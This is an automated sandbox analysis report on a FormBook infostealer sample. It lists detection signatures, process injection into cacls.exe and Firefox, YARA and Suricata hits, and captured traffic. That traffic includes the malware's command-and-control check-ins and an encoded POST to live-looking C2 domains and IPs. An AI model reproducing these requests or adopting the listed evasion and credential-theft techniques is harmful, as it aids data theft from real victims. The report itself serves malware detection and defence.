Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PGK60fNNCZ.exe

Overview

General Information

Sample name:PGK60fNNCZ.exe
renamed because original name is a hash value
Original sample name:daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290.exe
Analysis ID:1588678
MD5:be729fe26e81cb5d5ab76fa5a235accb
SHA1:30c08240bae5fe587671eb22edb703e6da07e909
SHA256:daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PGK60fNNCZ.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
    • PGK60fNNCZ.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
    • PGK60fNNCZ.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
    • PGK60fNNCZ.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\PGK60fNNCZ.exe" MD5: BE729FE26E81CB5D5AB76FA5A235ACCB)
      • QxPduTOtZWkp.exe (PID: 1200 cmdline: "C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cacls.exe (PID: 8092 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • QxPduTOtZWkp.exe (PID: 6208 cmdline: "C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5992 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.PGK60fNNCZ.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.PGK60fNNCZ.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T04:06:30.782095+010020507451Malware Command and Control Activity Detected192.168.2.75132074.208.236.15680TCP
                2025-01-11T04:06:54.258368+010020507451Malware Command and Control Activity Detected192.168.2.75132484.32.84.3280TCP
                2025-01-11T04:07:07.423091+010020507451Malware Command and Control Activity Detected192.168.2.75132813.248.169.4880TCP
                2025-01-11T04:07:20.828709+010020507451Malware Command and Control Activity Detected192.168.2.75133266.29.149.4680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: PGK60fNNCZ.exeReversingLabs: Detection: 68%
                Source: PGK60fNNCZ.exeVirustotal: Detection: 79%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PGK60fNNCZ.exeJoe Sandbox ML: detected
                Source: PGK60fNNCZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PGK60fNNCZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QxPduTOtZWkp.exe, 00000008.00000000.1787927028.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2548675572.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PGK60fNNCZ.exe, PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEC940 FindFirstFileW,FindNextFileW,FindClose,9_2_00BEC940
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h9_2_00BD9E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then xor eax, eax9_2_00BD9E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then pop edi9_2_00BDE4AE
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h9_2_00BD9E46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h9_2_036004BE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51320 -> 74.208.236.156:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51324 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51328 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:51332 -> 66.29.149.46:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aktmarket.xyz
                Source: global trafficTCP traffic: 192.168.2.7:51182 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
                Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
                Source: Joe Sandbox ViewASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy4 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy4 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r2k9/?-pztsZ6x=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z4XbG+3l1So+gPg3dZW44XObjN+WC+Ppk5idK3Qy4ode17oimlo20fhs9&jHc=_xZhxrExRJpXy4 HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                Source: global trafficDNS traffic detected: DNS query: www.techmiseajour.net
                Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global trafficDNS traffic detected: DNS query: www.golivenow.live
                Source: global trafficDNS traffic detected: DNS query: www.iglpg.online
                Source: unknownHTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 221Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 2d 70 7a 74 73 5a 36 78 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 69 57 4f 5a 31 5a 57 6b 48 74 46 38 32 72 4d 73 53 32 32 62 54 62 78 51 68 73 68 69 4b 43 45 58 54 69 73 72 4a 41 66 4c 72 38 71 6f 6d 62 49 54 6e 67 3d 3d Data Ascii: -pztsZ6x=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiWOZ1ZWkHtF82rMsS22bTbxQhshiKCEXTisrJAfLr8qombITng==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Sat, 11 Jan 2025 03:06:30 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:07:13 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:07:15 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:07:18 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
